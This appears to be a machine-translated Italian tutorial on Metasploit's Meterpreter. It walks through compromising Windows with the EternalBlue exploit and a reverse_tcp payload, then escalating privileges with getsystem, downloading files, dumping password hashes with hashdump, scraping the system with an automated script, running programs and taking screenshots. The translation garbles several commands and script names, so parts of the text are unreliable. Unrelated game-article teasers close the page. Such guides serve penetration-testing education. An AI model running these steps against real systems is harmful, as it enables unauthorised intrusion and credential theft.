metasfruttamento

Post sfruttamento con Meterpreter

Post sfruttamento con Meterpreter
Questa è un'introduzione al plug-in di carico utile Meterpreter all'interno di Metasploit. In questo breve tutorial, discuteremo come usarlo per applicare il post sfruttamento a un sistema operativo WINDOWS una volta che lo hai già violato usando l'exploit Eternalblue. Ci limiteremo ad accedere al sistema windows ed esplorarlo, e tutte le cose che andremo a fare si concentreranno sull'accesso alle informazioni e alle credenziali utente.

Introduzione a Meterpreter

Meterpreter è un payload di attacco nel framework Metasploit che consente all'autore di controllare e navigare nel computer vittima attraverso una shell di comando. Può rivelarsi uno strumento molto versatile quando si tratta di test di penetrazione.  È uno strumento di post-sfruttamento basato sull'iniezione di DLL in memoria, il che significa che esegue la DLL iniettata creando un nuovo processo che richiede al sistema di eseguire la DLL iniettata. Può darti accesso a una shell di comando invisibile su una macchina vittima, permettendoti di eseguire eseguibili e reti di profili.

È stato originariamente scritto per Metasploit 2.x ed è aggiornato per Metasploit 3.

Discuteremo gli usi di Meterpreter in dettaglio, ma prima di ciò, diamo una parola sui payload in generale

Cosa sono i payload??

I payload in Metasploit sono moduli, il che significa che sono frammenti di codici all'interno di Metasploit che vengono eseguiti sul sistema remoto a cui ci rivolgiamo. Viene inviato per primo il modulo exploit, che installa il modulo payload sul sistema. Quindi il payload concede l'accesso all'attaccante (limitato o completo, dipende dal contenuto del payload). Per approfondire ulteriormente il funzionamento dei payload, dobbiamo discuterne le tipologie, che sono 3 in totale:

single

Questi payload sono completamente autonomi, il che significa che possono essere semplici come codici gatekeeper che consentono all'utente di accedere a un sistema di destinazione.

Stager

Gli stager sono payload che raccolgono applicazioni all'interno del sistema di destinazione e le inviano all'attaccante. Stabilisce la connessione tra la vittima e la nostra macchina locale.

Fasi

Una volta che gli stager hanno accesso al sistema, scaricano i moduli degli stage. I moduli Stages rimuovono il limite di dimensione sul meterpreter.

Esempi di fasi potrebbero essere una shell semplice, una shell "ipwn" per iPhone, moduli Meterpreter, VNC Injection.

Puoi calcolare il tipo di carico utile immaginandone il nome. I singoli payload sono solitamente del formato /

Sfruttamento con Meterpreter

Prima di tutto, avvia la console msf digitando il seguente comando del terminale nella finestra del terminale di Kali.

$ sudo msfconsole

Usiamo reverse_tcp come stager e Meterpreter come stage.

Inizieremo impostando l'exploit di Eternal Blue. Seleziona (ms17_010_eternalblue) quindi imposta windows/x64/meterpreter/reverse_tcp come payload selezionato

Quindi, configura le impostazioni dell'exploit, quindi esegui l'exploit con il comando exploit:

$ imposta payload windows/x64/meterpreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploit

Il Eternalblue exploit E è stato attivato con successo.

Post sfruttamento

Accediamo e manipoliamo il sistema già compromesso durante il post-sfruttamento.

Possiamo fare un sacco di cose ora che abbiamo accesso al sistema, ma come accennato in precedenza, dobbiamo rimanere concentrati principalmente sul download di informazioni e sull'ottenimento delle credenziali utente qui

Gestione dei privilegi di accesso:

A seconda del modulo payload e dell'exploit che hai utilizzato, potresti dover affrontare alcune restrizioni di accesso che paralizzeranno gravemente le tue capacità di manovrare la macchina vittima. Puoi aggirare questo problema con l'escalation dei privilegi eliminando le password e manomettendo i registri. Puoi anche aumentare i privilegi usando il comando get system di Meterpreter.

$ getsystem
$ getuid

Trasferimento di file con Meterpreter

Con Meterpreter, puoi scaricare un file usando il comando $download-.

$ download /windows/system32/drivers/etc/hosts

Allo stesso modo, puoi anche caricare le informazioni sulla macchina, usando $upload-comando

Estrazione delle credenziali utente:

Usa lo script di codice credential_collector per estrarre le informazioni sugli account utente o usa il modulo del post di dump dell'hash per un effetto simile.

Utilizzeremo il modulo post dump dell'hash per procedere con la raccolta delle credenziali. Digita il seguente comando msf.

$ esegui post/windows/gather/hashdump

Come possiamo vedere, abbiamo ottenuto gli account Coen, ospite e amministratore. L'hash LM (dell'amministratore) e l'hash NTLM (dell'ospite) riguardano le password vuote, mentre l'hash Coen è una password che dovrai decifrare. Puoi farlo usando un cracker di password.

Automatizzare lo scraping del sistema

Può essere noioso raccogliere informazioni con istruzioni di input individuali che devi continuare ad alimentare la shell dei comandi. Convenientemente, puoi in qualche modo automatizzare questo processo con vineum-script. Lo script raccoglie informazioni dalla vittima e scarica i dati nel nostro computer locale. Ti verrà detto dove viene salvato l'output, come puoi vedere nella quarta riga dall'alto:

$ esegui wineum

Tieni presente che il percorso in cui è memorizzato l'output di ciascun comando potrebbe essere diverso da quello visualizzato qui.

scherziamo un po' di più

Esecuzione di file

Puoi eseguire qualsiasi file sul sistema usando: execute -f . Ciò include sia i file eseguibili che i programmi con più file di supporto. Ad esempio, per eseguire l'app calcolatrice integrata nel sistema operativo Windows, digita eseguire -f calc.EXE

Fare screenshot

Puoi anche acquisire schermate dal punto di vista dell'utente. Basta digitare screenshot nella shell dei comandi di Meterpreter e otterrai uno screenshot del display sul sistema.

$ esegui -f calcola.EXE
$ screenshot

Conclusione:

Questa è stata una breve introduzione al plugin Meterpreter nel framework Metasploit, insieme a una breve guida che mostra i suoi usi più basilari. Abbiamo imparato qui come possiamo violare un sistema operativo Windows con l'exploit Eternalblue per ottenere l'accesso, quindi utilizzare Meterpreter per aumentare i privilegi, raccogliere informazioni manualmente e automatizzando il comando vineus-. Abbiamo anche imparato come eseguire file sulla macchina vittima victim.

Meterpreter può servire come mezzo apprezzabile di rilevamento delle vulnerabilità, nonostante sia un conglomerato di strumenti di base all'interno del framework di Metasploit.

Battaglia per Wesnoth 1.13.6 Sviluppo rilasciato
Battaglia per Wesnoth 1.13.6 rilasciato il mese scorso, è la sesta versione di sviluppo nella 1.13.x e offre una serie di miglioramenti, in particolar...
Come installare League Of Legends su Ubuntu 14.04
Se sei un fan di League of Legends, questa è un'opportunità per testare League of Legends. Nota che LOL è supportato su PlayOnLinux se sei un utente L...
Installa l'ultimo gioco di strategia OpenRA su Ubuntu Linux
OpenRA è un motore di gioco di strategia in tempo reale gratuito/libero che ricrea i primi giochi di Westwood come il classico Command & Conquer: Red ...